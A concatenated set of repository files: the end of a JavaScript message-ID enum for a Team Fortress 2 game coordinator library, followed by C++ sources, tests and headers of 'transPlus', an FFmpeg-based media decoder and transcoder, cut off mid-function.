// EGCBaseClientMsg
PingRequest: 3001,
PingResponse: 3002,
ClientWelcome: 4004,
ServerWelcome: 4005,
ClientHello: 4006,
ServerHello: 4007,
ClientGoodbye: 4008,
ServerGoodbye: 4009,
// EGCBaseMsg
SystemMessage: 4001,
ReplicateConVars: 4002,
ConVarUpdated: 4003,
InviteToParty: 4501,
InvitationCreated: 4502,
PartyInviteResponse: 4503,
KickFromParty: 4504,
LeaveParty: 4505,
ServerAvailable: 4506,
ClientConnectToServer: 4507,
GameServerInfo: 4508,
Error: 4509,
Replay_UploadedToYouTube: 4510,
LANServerAvailable: 4511,
// ETFGCMsg
ReportWarKill: 5001,
VoteKickBanPlayer: 5018,
VoteKickBanPlayerResult: 5019,
KickPlayer_DEPRECATED: 5020,
StartedTraining_DEPRECATED: 5021,
FreeTrial_ChooseMostHelpfulFriend: 5022,
RequestTF2Friends: 5023,
RequestTF2FriendsResponse: 5024,
Replay_SubmitContestEntry: 5026,
Replay_SubmitContestEntryResponse: 5027,
Saxxy_Awarded: 5029,
FreeTrial_ThankedBySomeone: 5028,
FreeTrial_ThankedSomeone: 5030,
FreeTrial_ConvertedToPremium: 5031,
MeetThePyroSilliness_BananaCraft_DEPRECATED: 5032,
MVMARG_HighFiveSuccessResponse_DEPRECATED: 5033,
MVMARG_HighFiveOnClient_DEPRECATED: 5034,
Coaching_AddToCoaches: 5200,
Coaching_AddToCoachesResponse: 5201,
Coaching_RemoveFromCoaches: 5202,
Coaching_RemoveFromCoachesResponse: 5203,
Coaching_FindCoach: 5204,
Coaching_FindCoachResponse: 5205,
Coaching_AskCoach: 5206,
Coaching_AskCoachResponse: 5207,
Coaching_CoachJoinGame: 5208,
Coaching_CoachJoining: 5209,
Coaching_CoachJoined: 5210,
Coaching_LikeCurrentCoach: 5211,
Coaching_RemoveCurrentCoach: 5212,
Coaching_AlreadyRatedCoach: 5213,
Duel_Request: 5500,
Duel_Response: 5501,
Duel_Results: 5502,
Duel_Status: 5503,
Halloween_ReservedItem_DEPRECATED: 5600,
Halloween_GrantItem_DEPRECATED: 5601,
Halloween_GrantItemResponse_DEPRECATED: 5604,
Halloween_Cheat_QueryResponse_DEPRECATED: 5605,
Halloween_ItemClaimed_DEPRECATED: 5606,
Halloween_ReservedItem: 5607,
Halloween_GrantItem: 5608,
Halloween_GrantItemResponse: 5609,
Halloween_Cheat_QueryResponse_DEPRECATED_2: 5610,
Halloween_ItemClaimed_DEPRECATED_2: 5611,
Halloween_ServerBossEvent: 5612,
Halloween_Merasmus2012: 5613,
Halloween_UpdateMerasmusLootLevel: 5614,
GameServer_LevelInfo: 5700,
GameServer_AuthChallenge: 5701,
GameServer_AuthChallengeResponse: 5702,
GameServer_CreateIdentity: 5703,
GameServer_CreateIdentityResponse: 5704,
GameServer_List: 5705,
GameServer_ListResponse: 5706,
GameServer_AuthResult: 5707,
GameServer_ResetIdentity: 5708,
GameServer_ResetIdentityResponse: 5709,
Client_UseServerModificationItem: 5710,
Client_UseServerModificationItem_Response: 5711,
GameServer_UseServerModificationItem: 5712,
GameServer_UseServerModificationItem_Response: 5713,
GameServer_ServerModificationItemExpired: 5714,
GameServer_ModificationItemState: 5715,
GameServer_AckPolicy: 5716,
GameServer_AckPolicyResponse: 5717,
QP_ScoreServers: 5800,
QP_ScoreServersResponse: 5801,
QP_PlayerJoining: 5802,
PickupItemEligibility_Query_DEPRECATED: 6000,
PickupItemEligibility_Query_DEPRECATED_2: 6001,
IncrementKillCountAttribute_DEPRECATED: 6100,
IncrementKillCountResponse_DEPRECATED: 6101,
GameMatchSignOut: 6204,
CreateOrUpdateParty: 6233,
AbandonCurrentGame: 6235,
EMsgForceSOCacheResend: 6237,
RequestChatChannelList: 6260,
RequestChatChannelListResponse: 6261,
ReadyUp: 6270,
KickedFromMatchmakingQueue: 6271,
LeaverDetected: 6272,
LeaverDetectedResponse: 6287,
PlayerFailedToConnect: 6288,
ExitMatchmaking: 6289,
AcceptInvite: 6291,
AcceptInviteResponse: 6292,
MatchmakingProgress: 6293,
MvMVictoryInfo: 6294,
GameServerMatchmakingStatus: 6295,
CreateOrUpdatePartyReply: 6296,
MvMVictory: 6297,
MvMVictoryReply: 6298,
GameServerKickingLobby: 6299,
LeaveGameAndPrepareToJoinParty: 6300,
RemovePlayerFromLobby: 6301,
SetLobbySafeToLeave: 6302,
UpdatePeriodicEvent: 6400,
ClientVerificationChallenge: 6500,
ClientVerificationChallengeResponse: 6501,
ClientVerificationVerboseResponse: 6502,
ClientSetItemSlotAttribute: 6503,
PlayerSkillRating_Adjustment: 6504,
War_IndividualUpdate: 6505,
War_JoinWar: 6506,
War_RequestGlobalStats: 6507,
War_GlobalStatsResponse: 6508,
Dev_GrantWarKill: 10001
};
| 1298021559a2d092e9a778ab02cfa5db22885c70 | [
"Markdown",
"JavaScript"
] | 3 | Markdown | DontAskM8/node-tf2 | 6a02496dc594e9d7f46592ff322464bc46fe0f66 | 289f50037d03fabfc4a341a1789118917868e34b |
refs/heads/master | <repo_name>webinos-apps/poc-ContactsAndEvents<file_sep>/js/chatPage.js
var eventsServiceType = "http://webinos.org/api/events";
// Wait for document to load
$(document).ready(function () {
// We will be keeping the services found on these variables
var eventAPIToUse;
// Repeat the same code to bind to the event service. We could actually avoid this but htis is a POC
var bindEventsService = function (service) {
service.bindService({
onBind: function () {
eventAPIToUse = service;
$("#cmdPickEventApi").addClass("bound");
// TODO: add the code from the chat.js file
// line 257
}
});
};
// Use the find service and filter the results using the input of the
// dashboard
var findEventsService = function (serviceFilters) {
webinos.discovery.findServices(new ServiceType(serviceFilters.api), {
onFound: function (service) {
if (service.id == serviceFilters.id) {
bindEventsService(service);
}
}
}, {}, { zoneId: [serviceFilters.address] }); // Filter zone for the specific device
};
$("#cmdPickEventApi").bind('click', function () {
webinos.dashboard.open({
module: 'explorer',
data: {
service: eventsServiceType
}
}).onAction(function (data) {
// If user selected anything
if (data.result.length == 1) {
var serviceFilters = data.result[0];
// Store the service to rebind later on
localStorage["eventsService"] = JSON.stringify(serviceFilters);
findEventsService(serviceFilters);
}
});
});
// When we start let's try to rebind the stored services
if (localStorage["eventsService"]) { // If we have something stored
try {
var savedService = JSON.parse(localStorage["eventsService"]);
findEventsService(savedService);
} catch (e) {
// Empty problematic object
localStorage["eventsService"] = "";
}
}
});
<file_sep>/README.md
app-contacts
============
CONTACTS CHAT APP
=================
Contacts Description:
----------------------
Currently, lists the contacts from the selected source and provides the opportunity to search them.
There is an option to tweet to the selected contact.
Future option, include listing contacts from multiple sources, and displaying the contacts on the map.
Also, opportunity to manage contacts will be provided, when the following functions will be implemented in contacts API.
Instructions how to run the app:
1)copy files from app-contacts repository, so you get the following structure <directory with you Webinos-Platform>\Webinos-Platform\webinos\web_root\apps\app-contacts\
2)open in browser link - https://pzh.webinos.org/main.html, and login with you gmail account.
3)Run pzp in command line: <directory with you Webinos-Platform>\Webinos-Platform > node webinos_pzp
5)Go to http://localhost:8080/apps/app-contacts/contacts.html
6)Press the Settings
8)Enter the pass to thunderbird file for local authentication or login and password for gmail account.
9)Press Save Settings button.
9)Press Authenticae\Open button.
10)Press Go to Main Page or Go to Search Menu button to see all list of contacts or to find a contact.
11)Press a link to open a detailed page, associated with the contact.
12)You can tweet to the contact's nickname from your tweeter account using input box and button Tweet
on the contact's Detailed information page
Chat App:
=========
Features:
---------
1)When Clicked on the Chat Icon It shows the Chat User Screen that you have Entered with your Credentials to retrieve your Contacts
Then shows the Online Contacts if any and can Invite for the Chat.
2)Once the Invitation is accepted from the Users. If the User doesn't want to accept the Invite, User can select the cancel button.
3)The Chat Module opens the ChatBox Screen which includes the settings of the Chat that the Users can change.
4)The Components of the Chat Module are Chat Screen, Chat Box, Chat Text, Chat Button, Chat Input.
5)There is a Text Button which highlights when the Chat Box is hidden.
6)On the top of the Chat Screen next to the Chat Settings Panel an Exit Button is placed.
Settings Panel:
---------------
7)The function set settings holds all the Chat Settings functionality. This function is invoked then the settings button would be shown in the Chat Screen
The Setting Panel include:
There are Settings for both the Users, The one who is chatting can as well change the font, size, Color and style of the User with whom he/she is chatting with only on his own Screen.
* Font Color: Select opteions from black, red, green, blue
* Sytle: sans-serif, AmadeusRegular, SpecialEliteRegular, ScratchmybackRegular
* Font Size: 100%, 120%, 150%
* Status: whether the User is Available or Invisible.
| 9269a061c56baff53b15aac8194faacb56bc05a5 | [
"JavaScript",
"Markdown"
] | 2 | JavaScript | webinos-apps/poc-ContactsAndEvents | b3e53e623d189ef46dc72274ca2da78e395b58d8 | 884bf891d99ecbe04ee82d944d8fb136f1ea9046 |
refs/heads/master | <file_sep># dangerDon
Django Music Website, Created while learning viberr from New Boston But Now With extended features and capabilities.
# Install Requirements by:-
```
pip install -r requirements.txt
```
# Demo
.png)
.png)
.png)
.png)
.png)
.png)
<file_sep>{% extends 'music/base.html' %}
{% block body %}
<div class="container-fluid">
<div class="card col-sm-12 col-md-9 col-lg-7 my-3">
<div class="card-block mt-4 ">
<div class="card-header">
<h4> {% block heading %} Heading Here {% endblock %} </h4>
</div>
<form action="" method="POST" enctype="multipart/form-data" class="my-3">
{% csrf_token %}
{% include 'music/form-template.html' %}
<div class="form-group">
<button class="btn btn-success" type="submit">Submit</button>
</div>
</form>
</div>
</div>
</div>
{% endblock %}<file_sep>from django.conf import settings
from django.conf.urls import url,include
from django.conf.urls.static import static
from django.contrib import admin
from rest_framework.urlpatterns import format_suffix_patterns
from music import views
urlpatterns = [
url('^$', views.Home),
url(r'^admin/', admin.site.urls),
url(r'^music/', include('music.urls')),
url(r'^albums/', views.AlbumList.as_view()),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns = format_suffix_patterns(urlpatterns) <file_sep># -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-12 02:32
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('music', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='album',
old_name='alnum_logo',
new_name='album_logo',
),
]
<file_sep>from django.views.generic import View, ListView, DetailView
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login
from django.urls import reverse_lazy
from django.http.response import HttpResponse
from rest_framework.views import APIView
from rest_framework.response import Response
from .models import Album
from .forms import UserForm
from .serializers import AlbumSerializer
def Home(request):
return render(request, 'music/home.html')
class IndexView(ListView):
template_name='music/index.html'
context_object_name = 'all_albums'
def get_queryset(self):
return sorted(list(Album.objects.all()), key=lambda x:x.likes/x.dislikes ,reverse=True)
class DetailView(DetailView):
model = Album
template_name = 'music/detail.html'
class AlbumCreate(CreateView):
model = Album
fields = ['artist', 'album_title', 'genre', 'album_logo']
class AlbumUpdate(UpdateView):
model = Album
fields = ['artist', 'album_title', 'genre', 'album_logo']
class AlbumDelete(DeleteView):
model = Album
success_url = reverse_lazy('music:index')
class Like(View):
def post(self,request,pk):
a = Album.objects.filter(pk=pk)[0]
a.likes += 1
a.save()
#return redirect('music:detail', pk=pk)
return redirect('music:index')
class Dislike(View):
def post(self,request,pk):
a = Album.objects.filter(pk=pk)[0]
a.dislikes += 1
a.save()
return redirect('music:index')
class UserFormView(View):
form_class = UserForm
template_name = 'music/registration_form.html'
# display blank form
def get(self, request):
form = self.form_class(None)
return render(request, self.template_name, {'form':form})
# process form data
def post(self, request):
form = self.form_class(request.POST)
if form.is_valid():
user = form.save(commit=False)
# cleaning data
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user.set_password(password)
user.save()
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request,user)
return redirect('music:index')
return render(request, self.template_name, {'form':form})
# List All albums or create a new one
# alnums/
class AlbumList(APIView):
def get(self, request):
albums = Album.objects.all()
serializer = AlbumSerializer(albums, many=True)
return Response(serializer.data)
def post(self):
pass
| 0fc90a0f3754c9ec82931e58b6eb4825704d6dea | [
"Markdown",
"Python",
"HTML"
] | 5 | Markdown | abdurraufahmad/dangerDon | 57a60e1e5c06c7b6adcfbd329667e7422760d26c | 3c1c3b9b765d425f05729b71a32e06134df97372 |
refs/heads/master | <repo_name>sumo/transPlus<file_sep>/src/tests/FFmpegDecodingContainerTests.cpp
#include <gtest/gtest.h>
#include <iostream>
#include <map>
#include <fstream>
#include <vector>
#include <string>
#include "../FFmpegDecodingContainer.hpp"
#include "../streams/StreamReader.hpp"
#include <boost/shared_ptr.hpp>
using namespace boost;
TEST(FFmpegDecodingContainer, ReadContainer) {
ifstream src;
src.open("samplefiles/echo-hereweare.mp4", ios::binary);
StreamReader reader(src);
FFmpegDecodingContainer decoder(reader);
map<string, string> m = decoder.getFormat();
string format = (*m.begin()).first;
ASSERT_STREQ("mov,mp4,m4a,3gp,3g2,mj2", format.c_str());
ptr_vector<FFmpegStream> streams = decoder.getStreams();
ptr_vector<FFmpegStream>::iterator it;
for (it = streams.begin(); it < streams.end(); it++) {
if (it->getType() == AUDIO) {
ASSERT_STREQ("aac", it->getCodec().c_str());
} else {
ASSERT_STREQ("h264", it->getCodec().c_str());
}
}
}
<file_sep>/src/transPlus.cpp
//============================================================================
// Name : transPlus.cpp
// Author : <NAME>
// Version :
// Copyright : BSD Licence
// Description : Hello World in C++, Ansi-style
//============================================================================
#include "fixstdint.hpp"
#include <iostream>
#include <map>
#include <fstream>
#include <vector>
#include <boost/shared_ptr.hpp>
#include <log4cplus/logger.h>
#include <log4cplus/configurator.h>
extern "C" {
#include <libavcodec/avcodec.h>
#include <libavformat/avformat.h>
}
#include "streams/StreamReader.hpp"
#include "FFmpegDecodingContainer.hpp"
#include "FFmpegEncodingContainer.hpp"
#include "streams/StreamFactory.hpp"
using namespace std;
using namespace boost;
int main(int argc, char* argv[]) {
if(argc < 2) {
cout << "Usage: transPlus <filename>";
exit(255);
}
BasicConfigurator::doConfigure();
avcodec_register_all();
av_register_all();
string filename(argv[1]);
Logger logger = Logger::getInstance(LOG4CPLUS_TEXT("Main"));
LOG4CPLUS_INFO(logger, avcodec_configuration());
CodecList codecs = StreamFactory::getCodecList();
ContainerList containers = FFmpegEncodingContainer::getContainerList();
LOG4CPLUS_INFO(logger, "Configured with " << codecs.getCodecNames().size() << " codecs and " << containers.getContainers().size() << " containers");
LOG4CPLUS_INFO(logger, "Using file name " << filename);
ifstream src;
src.open(filename.c_str(), ios::binary);
StreamReader reader(src);
FFmpegDecodingContainer decoder(reader);
map<string, string> m = decoder.getFormat();
LOG4CPLUS_INFO(logger,
"Format of content stream is " << (*m.begin()).second);
ptr_vector<FFmpegStream> streams = decoder.getStreams();
ptr_vector<FFmpegStream>::iterator it;
for (it = streams.begin(); it < streams.end(); it++) {
LOG4CPLUS_INFO(logger, "Found stream " << it->getType() << " of codec " << it->getCodec());
}
decoder.runDecodeLoop();
}
<file_sep>/src/FFmpegDecodingContainer.hpp
/*
* DecodedDataObserver.h
*
* Created on: 31 Oct 2011
* Author: mediabag
*/
#ifndef FFMPEGDECODER_H_
#define FFMPEGDECODER_H_
#include "FFmpegContainer.hpp"
#include "events/DecodedDataObserver.hpp"
using namespace log4cplus;
using namespace std;
class FFmpegDecodingContainer: public FFmpegContainer {
StreamReader& streamReader;
AVInputFormat *fmt;
map<string, string> probeInfo;
AVIOContext *context;
boost::ptr_vector<DecodedDataObserver> observers;
unsigned char* buffer;
void probeFormat();
void probeStreams();
public:
FFmpegDecodingContainer(StreamReader);
virtual ~FFmpegDecodingContainer();
map<string, string> getFormat() {
return probeInfo;
}
template <class DecodedDataType, class StreamType>
void notifyObservers(Event<DecodedDataType, StreamType>& event);
void runDecodeLoop();
};
#endif /* FFMPEGDECODER_H_ */
<file_sep>/src/fixstdint.hpp
/*
* fixstdint.hpp
*
* Created on: 22 Sep 2011
* Author: mediabag
*/
#ifndef FIXSTDINT_HPP_
#ifdef __cplusplus
#define __STDC_CONSTANT_MACROS
#ifdef _STDINT_H
#undef _STDINT_H
#endif
# include <stdint.h>
#endif
#define FIXSTDINT_HPP_
#endif /* FIXSTDINT_HPP_ */
<file_sep>/src/streams/FFmpegAudioStream.hpp
#ifndef FFMPEGAUDIOSTREAM_H_
#define FFMPEGAUDIOSTREAM_H_
#include "FFmpegStream.hpp"
class Sound {
shared_ptr<uint8_t> data;
public:
Sound(shared_ptr<uint8_t> dt) :
data(dt) {
}
Sound(uint8_t* dt) :
data(dt) {
}
virtual ~Sound() {
}
shared_ptr<uint8_t> getData() {
return data;
}
};
class FFmpegAudioStream: public FFmpegStream {
shared_ptr<uint8_t> checkAndAllocateSampleBuffer(AVPacket);
public:
FFmpegAudioStream(AVStream*, AVFormatContext*, int streamIndex);
virtual ~FFmpegAudioStream() {
}
virtual StreamType getType() {
return AUDIO;
}
shared_ptr<Sound> decode(PacketPtr);
FFmpegAudioStream* clone() const {
return new FFmpegAudioStream(*this);
}
};
static shared_ptr<Sound> NoSound(new Sound(shared_ptr<uint8_t>()));
#endif
<file_sep>/src/events/Event.hpp
/*
* Event.hpp
*
* Created on: 25 May 2012
* Author: mediabag
*/
#ifndef EVENT_HPP_
#define EVENT_HPP_
#include <boost/shared_ptr.hpp>
#include <boost/bind.hpp>
#include "../FFmpeg.hpp"
#include "../streams/FFmpegAudioStream.hpp"
#include "../streams/FFmpegVideoStream.hpp"
template<class DecodedDataType, class StreamType>
class Event {
protected:
PacketPtr packet;
StreamType stream;
public:
Event(AVPacket p, StreamType& fs) :
packet(&p, boost::bind(&Event::destroy, this, _1)), stream(fs) {
}
virtual shared_ptr<DecodedDataType> decode() {
return stream.decode(packet);
}
virtual ~Event() {
}
FFmpegStream& getStream() {
return stream;
}
void destroy(AVPacket* pkt) {
av_free_packet(pkt);
}
PacketPtr getPacket() {
return packet;
}
};
typedef Event<Picture, FFmpegVideoStream> VideoEvent;
typedef Event<Sound, FFmpegAudioStream> AudioEvent;
#endif /* EVENT_HPP_ */
<file_sep>/src/streams/StreamReader.cpp
/*
* StreamReader.cpp
*
* Created on: 22 Sep 2011
* Author: mediabag
*/
#include "StreamReader.hpp"
StreamReader::StreamReader(istream& input) :
ios(input), logger(Logger::getInstance(LOG4CPLUS_TEXT("StreamReader"))) {
}
StreamReader::~StreamReader() {
}
void StreamReader::rewind() {
ios.seekg(ios_base::beg);
}
int StreamReader::read(uint8_t *buf, int buf_size) {
if (ios.eof()) {
LOG4CPLUS_DEBUG(logger, "Read complete");
return EOF;
} else {
ios.read(reinterpret_cast<char*>(buf), buf_size);
int outcome = ios.fail() ? ios.gcount() : buf_size;
LOG4CPLUS_DEBUG(logger,
"Read asked " << buf_size << " read " << outcome);
if (ios.fail() || ios.eof()) {
ios.clear(std::ios_base::failbit);
ios.clear(std::ios_base::eofbit);
}
return outcome;
}
}
int64_t StreamReader::seek(int64_t offset, int whence) {
int result = -1;
switch (whence) {
case AVSEEK_SIZE:
LOG4CPLUS_DEBUG(logger, "AVSEEK_SIZE");
return -1;
case SEEK_SET:
if (offset < 0) {
LOG4CPLUS_DEBUG(logger,
"SEEK_SET to negative offset of " << offset);
} else {
ios.seekg(offset, ios_base::beg);
result = (ios.fail() || ios.eof() ? -1 : (int64_t) ((ios.tellg())));
LOG4CPLUS_DEBUG( logger,
"SEEK_SET to " << offset << " resulted in " << result);
}
break;
case SEEK_CUR:
ios.seekg(ios.tellg() + offset);
result = (ios.fail() || ios.eof() ? -1 : (int64_t) ((ios.tellg())));
LOG4CPLUS_DEBUG(logger, "SEEK_CUR to " << ios.tellg() + offset << " resulted in " << result);
break;
case SEEK_END:
ios.seekg(offset, ios_base::end);
result = ios.fail() || ios.eof() ? -1 : (int64_t) (ios.tellg());
LOG4CPLUS_DEBUG(
logger,
"SEEK_END resulted in " << result);
break;
default:
LOG4CPLUS_DEBUG(logger, "Unknown whence " << whence);
break;
}
return result;
}
int StreamReader::readFunction(void* opaque, uint8_t *buf, int buf_size) {
StreamReader *me = (StreamReader*) opaque;
return me->read(buf, buf_size);
}
int64_t StreamReader::seekFunction(void* opaque, int64_t offset, int whence) {
StreamReader *me = (StreamReader*) opaque;
return me->seek(offset, whence);
}
<file_sep>/src/events/DecodedDataObserver.hpp
/*
* DecodedDataObserver.hpp
*
* Created on: 1 Nov 2011
* Author: mediabag
*/
#ifndef DECODEDDATAOBSERVER_HPP_
#define DECODEDDATAOBSERVER_HPP_
#include <vector>
#include <boost/shared_ptr.hpp>
#include <boost/bind.hpp>
#include "../FFmpeg.hpp"
#include "../streams/FFmpegStream.hpp"
#include "Event.hpp"
using namespace std;
using namespace boost;
class DecodedDataObserver {
public:
DecodedDataObserver();
virtual ~DecodedDataObserver();
public:
virtual void dataDecoded(shared_ptr<AudioEvent> event);
virtual void dataDecoded(shared_ptr<VideoEvent> event);
};
#endif /* DECODEDDATAOBSERVER_HPP_ */
<file_sep>/src/streams/FFmpegAudioStream.cpp
/*
* FFmpegAudioStream.cpp
*
* Created on: 3 Nov 2011
* Author: mediabag
*/
#include "FFmpegAudioStream.hpp"
FFmpegAudioStream::FFmpegAudioStream(AVStream* avs, AVFormatContext* ctx, int streamIndex) :
FFmpegStream(avs, ctx, "FFmpegAudioStream", streamIndex) {
}
shared_ptr<Sound> FFmpegAudioStream::decode(PacketPtr packet) {
AVPacket* pkt = packet.get();
adjustTimeStamps(*pkt);
shared_ptr<uint8_t> samples = checkAndAllocateSampleBuffer(*pkt);
int decodedDataSize = 0;
/* XXX: could avoid copy if PCM 16 bits with same
endianness as CPU */
int dataSize = avcodec_decode_audio3(avStream->codec, (int16_t*)samples.get(),
&decodedDataSize, pkt);
if (dataSize < 0) {
string msg;
msg = "Failed to decode audio dts=";
msg += avStream->cur_dts;
msg += " pts=";
msg += avStream->pts.val;
msg += " - ";
throw new TranscodeException(msg, dataSize);
}
pkt->data += dataSize;
pkt->size -= dataSize;
/* Some bug in mpeg audio decoder gives */
/* decoded_data_size < 0, it seems they are overflows */
if (decodedDataSize > 0) {
// do this later
// ist->next_pts += ((int64_t) AV_TIME_BASE / bps * decoded_data_size)
// / (ist->st->codec->sample_rate * ist->st->codec->channels);
LOG4CPLUS_DEBUG(logger,
"Got audio dts=" << pkt->dts << " pts=" << pkt->pts);
shared_ptr<Sound> sndPointer(new Sound(samples));
return sndPointer;
}
return NoSound;
}
shared_ptr<uint8_t> FFmpegAudioStream::checkAndAllocateSampleBuffer(AVPacket pkt) {
int16_t* samples;
int sampleSize = 0;
int max = FFMAX(pkt.size*sizeof(*samples), AVCODEC_MAX_AUDIO_FRAME_SIZE);
if (sampleSize < max) {
sampleSize = max;
if (samples != NULL) {
av_free(samples);
}
samples = (int16_t*) av_malloc(sampleSize);
}
return shared_ptr<uint8_t>((uint8_t*)samples);
}
<file_sep>/src/TranscodeException.cpp
/*
* TranscodeException.cpp
*
* Created on: 25 Sep 2011
* Author: mediabag
*/
#include "TranscodeException.hpp"
TranscodeException::TranscodeException(string &m):msg(m) {
}
TranscodeException::TranscodeException(string &m, int avErrorCode):msg(m) {
if (avErrorCode < 0) {
append(avErrorCode);
}
}
TranscodeException::TranscodeException(int avErrorCode):msg() {
append(avErrorCode);
}
TranscodeException::TranscodeException():msg("A transcode exception occured") {
}
TranscodeException::TranscodeException(const char* cpmsg, int avErrorCode):msg(cpmsg) {
append(avErrorCode);
}
TranscodeException::TranscodeException(const char* cpmsg):msg() {
msg << cpmsg;
}
TranscodeException::TranscodeException(const TranscodeException& c):msg() {
msg << c.msg;
}
TranscodeException::~TranscodeException() throw () {
}
void TranscodeException::append(int avErrorCode) {
if (avErrorCode < 0) {
char *s = new char[1024];
av_strerror(avErrorCode, s, 1024);
msg << s << "(" << avErrorCode << ")";
delete s;
}
}
const char* TranscodeException::what() const throw () {
return msg.str().c_str();
}
<file_sep>/src/FFmpegContainer.cpp
/*
* FFmpegContainer.cpp
*
* Created on: 22 May 2012
* Author: mediabag
*/
#include "FFmpegContainer.hpp"
void checkForError(int code) {
if (code < 0) {
char* s = new char[1024];
av_strerror(code, s, 1024);
TranscodeException* t = new TranscodeException(s, code);
delete s;
throw t;
}
}
<file_sep>/src/streams/FFmpegVideoStream.cpp
/*
* FFmpegAudioStream.cpp
*
* Created on: 3 Nov 2011
* Author: mediabag
*/
#include "FFmpegVideoStream.hpp"
shared_ptr<Picture> FFmpegVideoStream::decode(PacketPtr packet) {
AVPacket& pkt = *packet;
adjustTimeStamps(pkt);
shared_ptr<AVFrame> pFrame(new AVFrame());
int gotPicture = 0;
if (pkt.size > 0) {
int decodedDataSize = (avStream->codec->width * avStream->codec->height
* 3) / 2;
/* XXX: allocate picture correctly */
avcodec_get_frame_defaults(pFrame.get());
int ret = avcodec_decode_video2(avStream->codec, pFrame.get(), &gotPicture,
&pkt);
avStream->quality = pFrame->quality;
if (ret < 0) {
string msg;
msg = "Failed to decode video dts=";
msg += avStream->cur_dts;
msg += " pts=";
msg += avStream->pts.val;
msg += " - ";
throw new TranscodeException(msg, ret);
}
if (gotPicture) {
// deal with the picture
LOG4CPLUS_DEBUG(logger,
"Got picture dts=" << pkt.dts << " pts=" << pkt.pts);
Picture* pict = new Picture(pFrame);
return shared_ptr<Picture>(pict);
}
// deal with this
// if (avStream->codec->time_base.num != 0) {
// int ticks = ist->st->parser ? ist->st->parser->repeat_pict + 1
// : ist->st->codec->ticks_per_frame;
// ist->next_pts += ((int64_t) AV_TIME_BASE
// * ist->st->codec->time_base.num * ticks)
// / ist->st->codec->time_base.den;
// }
}
return NoPicture;
}
<file_sep>/src/streams/StreamReader.hpp
/*
* StreamReader.h
*
* Created on: 22 Sep 2011
* Author: mediabag
*/
#ifndef STREAMREADER_H_
#include <iostream>
#include "../fixstdint.hpp"
#include <log4cplus/logger.h>
#include <log4cplus/configurator.h>
extern "C" {
#include <libavformat/avio.h>
}
#define STREAMREADER_H_
using namespace std;
using namespace log4cplus;
class StreamReader {
istream& ios;
Logger logger;
public:
StreamReader(istream& ios);
virtual ~StreamReader();
void rewind();
int read(uint8_t *buf, int buf_size);
int64_t seek(int64_t offset, int whence);
static int readFunction(void* opaque, uint8_t *buf, int buf_size);
static int64_t seekFunction(void* opaque, int64_t offset, int whence);
};
#endif /* STREAMREADER_H_ */
<file_sep>/src/FFmpegEncodingContainer.hpp
/*
* FFmpegEncoder.h
*
* Created on: 21 May 2012
* Author: mediabag
*/
#ifndef FFMPEGENCODER_H_
#define FFMPEGENCODER_H_
#include "FFmpegContainer.hpp"
#include "Helper.hpp"
class StreamFactory;
class FFmpegEncodingContainer: public FFmpegContainer {
private:
AVFormatContext* oc;
public:
static FFmpegEncodingContainer* makeContainer(string ct);
static ContainerList& getContainerList() {
static ContainerList containerList; // constructor runs once, when someone first needs it
return containerList;
}
FFmpegEncodingContainer(AVFormatContext* fc);
virtual ~FFmpegEncodingContainer();
string getContainerId();
string getContainerName();
friend class StreamFactory;
};
#endif /* FFMPEGENCODER_H_ */
<file_sep>/src/FFmpegDecodingContainer.cpp
/*
* FFmpegDecoder.cpp
*
* Created on: 1 Nov 2011
* Author: mediabag
*/
#include "FFmpegDecodingContainer.hpp"
FFmpegDecodingContainer::FFmpegDecodingContainer(StreamReader sr) :
FFmpegContainer(Logger::getInstance(LOG4CPLUS_TEXT("FFmpegDecoder"))), streamReader(
sr) {
probeFormat();
probeStreams();
}
FFmpegDecodingContainer::~FFmpegDecodingContainer() {
if (formatContext != NULL) {
av_close_input_stream(formatContext);
}
if (buffer != NULL) {
delete[] buffer;
}
}
void FFmpegDecodingContainer::probeFormat() {
u_int8_t* buffer = new u_int8_t[BUF_SIZE_ADJUSTED];
streamReader.rewind();
streamReader.read(buffer, BUF_SIZE);
streamReader.rewind();
AVProbeData *probeData = new AVProbeData;
probeData->buf = buffer;
probeData->buf_size = BUF_SIZE;
probeData->filename = "";
fmt = av_probe_input_format(probeData, 1);
delete[] buffer;
delete probeData;
if (fmt != NULL) {
LOG4CPLUS_DEBUG( logger,
"Probe successful: " << fmt->name << ": " << fmt->long_name);
probeInfo[string(fmt->name)] = string(fmt->long_name);
//fmt->flags |= AVFMT_NOFILE;
} else {
throw TranscodeException("Failed to probe format");
}
}
void FFmpegDecodingContainer::probeStreams() {
buffer = new unsigned char[BUF_SIZE_ADJUSTED];
context = avio_alloc_context(buffer, BUF_SIZE, 0, (void*) &streamReader,
StreamReader::readFunction, NULL, StreamReader::seekFunction);
context->buf_end = context->buf_ptr;
formatContext = avformat_alloc_context();
formatContext->pb = context;
int i = avformat_open_input(&formatContext, "", fmt, NULL);
if (i < 0) {
throw TranscodeException(i);
}
LOG4CPLUS_DEBUG(logger, "Format: " << string(formatContext->iformat->name));
AVStream** avStreams = formatContext->streams;
for (unsigned int i = 0; i < formatContext->nb_streams; i++) {
AVStream *stream = avStreams[i];
switch (stream->codec->codec_type) {
case AVMEDIA_TYPE_VIDEO:
LOG4CPLUS_DEBUG(logger, "Creating video stream");
ffStreams.push_back(
new FFmpegVideoStream(stream, formatContext, i));
break;
case AVMEDIA_TYPE_AUDIO:
LOG4CPLUS_DEBUG(logger, "Creating audio stream");
ffStreams.push_back(
new FFmpegAudioStream(stream, formatContext, i));
break;
case AVMEDIA_TYPE_DATA:
case AVMEDIA_TYPE_NB:
case AVMEDIA_TYPE_SUBTITLE:
case AVMEDIA_TYPE_UNKNOWN:
case AVMEDIA_TYPE_ATTACHMENT:
default:
LOG4CPLUS_DEBUG( logger,
"Unknown stream " << stream->codec->codec_type << " has to be ignored");
break;
}
}
LOG4CPLUS_INFO(logger, "Found " << ffStreams.size() << " streams");
}
template<class DecodedDataType, class StreamType>
void FFmpegDecodingContainer::notifyObservers(Event<DecodedDataType, StreamType>& event) {
}
void FFmpegDecodingContainer::runDecodeLoop() {
bool eof = false;
